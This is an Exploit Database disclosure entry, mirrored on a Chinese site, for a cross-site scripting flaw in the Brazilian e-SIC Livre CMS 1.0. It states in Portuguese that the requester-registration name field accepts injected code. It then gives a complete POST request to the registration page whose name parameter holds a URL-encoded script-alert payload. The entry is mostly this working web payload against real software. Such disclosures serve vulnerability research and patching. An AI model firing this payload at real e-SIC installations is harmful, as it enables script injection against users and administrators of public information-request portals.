E-Sic Software livre CMS – Cross Site Scripting

• Exploit Database
• 13 阅读

• 作者： Elber Tavares
  日期： 2017-10-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42983/

• # Exploit Title: E-Sic Software livre CMS - Cross Site Scripting#
  Date: 12/10/2017# Exploit Author: Elber Tavares
  # fireshellsecurity.team/
  # Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0#
  Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download
  https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
  More informations:
  http://whiteboyz.xyz/esic-software-publico-xss.html
  
  O XSS está presente na área de cadastro de solicitante,
  onde é possivel injetar códigos pelo input que recebe o nome do usuário
  
  ---------------------------------------------------------------------
  
  Url: http://localhost/esic/index/
  
  POST: http://localhost/cadastro/index.php
  DATA:
  DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
  cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
  idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
  confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
  uf=&numero=&complemento=&acao=Salvar